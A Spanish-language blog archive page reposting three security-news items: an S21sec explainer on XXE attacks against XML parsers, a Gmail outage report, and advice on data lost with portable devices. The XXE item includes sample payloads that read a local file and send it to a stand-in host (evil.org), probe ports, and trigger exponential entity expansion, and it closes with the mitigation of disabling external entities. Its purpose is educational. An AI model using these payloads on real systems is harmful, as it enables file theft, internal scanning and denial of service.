Tag Archives: buscar

Ataques contra parsers XML

Posted on by
Reply

XML se ha convertido en un estándar para el intercambio de información y es la base de tecnologías emergentes como Ajax/Web 2.0 y Web services.

XML permite el uso de entidades, estos elementos básicamente sirven para referenciar su contenido dentro del propio documento. Un uso típico de una entidad es cuando definimos una abreviatura de un nombre largo para posteriormente utilizar su versión corta dentro del documento, por ejemplo:
< !ENTITY s21 "Grupo S21sec Gestión ">

Menos conocida es la posibilidad de insertar contenido de elementos externos, por ejemplo: 

< !ENTITY midoc SYSTEM "http://www.s21sec.com /midoc.xml">< !ENTITY arch SYSTEM "arch.txt">

El problema aparece cuando el parser que trata los datos de entrada XML procesa sin ninguna restricción elementos como los anteriores descritos. Es entonces cuando podemos utilizar esta técnica, que comúnmente recibe el nombre de “Ataques XXE (XML eXternal Entity)”, para atacar al servidor que procesa el documento XML.

Lectura de ficheros arbitrarios: Se trata sencillamente de definir una entidad que expanda el contenido de un fichero local del servidor. Aún así, notar que el parser XML espera un documento con cierto formato y existen restricciones en los tipos de ficheros aceptados por el parser a no ser que se indique explícitamente que no tienen formato. Ejemplo: 

< !DOCTYPE doc [        < !ENTITY bootini SYSTEM "file:///C:/boot.ini ">< !ENTITY enviarb SYSTEM "http://evil.org/?&bootini;">]>

Escaneo de puertos: Se trata de definir entidades externas que el servidor deba resolver para insertar su contenido en el documento. 

< !DOCTYPE scan [ < !ENTITY s21sec SYSTEM "http://1.1.1.1:21/">]>

Existe un documento excelente detallando esta técnica de Colin Wong de SIFT.

Ataques de denegación de servicio: Otro ataque que nos permiten las entidades externas es hacer referencia a una entidad cuyo contenido implique un procesamiento exponencial por parte del parser XML. Por ejemplo, un parser vulnerable requerirá
grandes cantidades de memoria para expandir la siguiente entidad: 

< !DOCTYPE SOAP-ENV:Envelope [       < !ENTITY x0 "s21sec">< !ENTITY x1 "&x0&x0">< !ENTITY x2 "&x1&x1">...< !ENTITY x100 "&x99&x99">]>

Para prevenir todos estos ataques hemos de indicar al parser XML que no procese entidades externas, la implementación de esta restricción dependerá en gran medida del parser que utilicemos.

Javier Méndez Navarro
S21sec Auditoría

Fuente: S21Sec

Read the rest here:
Ataques contra parsers XML |

Gmail no funciona(ba)

Posted on by
Reply

Parece que se está haciendo costumbre que Google se “enferme” y el mundo habla de ello.

Desde las primeras horas de hoy, el mail de Google dejó de funcionar. Admiten que el problema se debería a los servidores de la compañía.

El popular servicio de correo electrónico de Google, Gmail, registra desde media mañana problemas de acceso. “Algunos usuarios están teniendo dificultades a la hora de acceder a su correo desde Gmail“, según explica una breve nota de la empresa.

Al tiempo que asegura que “están trabajando para resolver el problema“, Google se disculpa “por los inconvenientes que puedan derivarse”.

Tal y como se explica en la nota informativa de Google, “cualquier usuario que esté teniendo dificultades técnicas puede ir al Centro de Ayuda de Gmail, donde se irán ofreciendo nuevos datos sobre la situación“.

El servicio ha dejado de funcionar correctamente desde las primeras horas de la mañana y todavía no ha podido ser restablecido.

Muchos bloggers ya se hicieron eco de la novedad, uno de ellos ironizó con el slogan de campaña de Barack Obama y tituló: “Sin gmail…yes, we can…

Google intenta solucionar la incidencia, ya que sabe “lo importante que es Gmail para los usuarios“, enfatizaron desde la compañía.

Fuente: Infobae

Read the original post: 
Gmail no funciona(ba) |

Cuidar la información digital que transportamos

Posted on by
Reply

No solo podemos ser víctimas del robo de información. También podemos “olvidarla” en los bolsillos de la ropa que enviamos a la tintorería.

En artículos anteriores, hemos hecho referencia al costo que significa la perdida de un ordenador portátil o un teléfono móvil. La información allí almacenada, se cotiza bastante bien en el mercado negro.

Recientes encuestas realizadas en el Reino Unido, indicaban que bastante más gente de la que se pensaba, suele olvidar vaciar los bolsillos de las prendas que lleva a la tintorería. Allí, los dependientes encuentran todo tipo de cosas. Sin embargo, se destacan las pequeñas computadoras de mano, teléfonos celulares y memorias portátiles (iPods, pendrives, etc.). Estas últimas parecerían ser los objetos olvidados más comunes.

También es alta la cantidad de objetos que suelen quedar abandonados en los taxis. Según los estudios, semestralmente cerca de 6200 dispositivos de los antes mencionados, son extraviados en el transporte público de Londres, pese a las campañas de seguridad que se implementan para hacer conciente a la gente que debe tomar mayores recaudos para proteger su información.

El uso actual de laptops y dispositivos portátiles se ha incrementado enormemente, debido a la mejora en los propios productos y al descenso de sus precios en el mercado.

Lamentablemente, salvo los más recientes, la mayoría de estos artículos no constan con la implementación de mecanismos de seguridad contra pérdida o robo, que permitan asegurar a sus dueños que aunque los extravíen, la información almacenada en ellos será inaccesible para terceros.

Las personas suelen preocuparse de su propia seguridad, pero no son tan conscientes del alcance que puede tener la divulgación o uso de los datos que ellos almacenan en sus dispositivos móviles.

La pérdida de un teléfono celular o una Palm, puede llegar a arriesgar los negocios, y hasta el trabajo de su dueño, pero también pondrá en peligro a todos los contactos allí almacenados. Con los números telefónicos y algunos otros datos, un atacante fácilmente puede montar una estafa de la cual obtendrá alguna clase de ganancia.

Las pequeñas y medianas empresas que llegan a extraviar una o más computadoras portátiles al año, deberían considerar no solo el cifrar los datos que salen de su edificio, sino también llevar a cabo campañas para hacer tomar conciencia a sus empleados sobre los cuidados del equipo (y de la información) cuando los utilicen fuera de sus edificios.

Cada vez más fabricantes implementan pequeños sistemas para incrementar la seguridad brindada a sus consumidores, tales como bloqueos a distancia, capacidad de cifrado, GPS para localizar equipos robados o extraviados, y otros. Pero todo debe partir de la base de que debemos aprender a ser más cuidadosos no solo con el manejo del contenido, sino también del contenedor de la información digital.

Fuente: http://www.enciclopediavirus.com/noticias/verNoticia.php?id=1094

See the original post here: 
Cuidar la información digital que transportamos |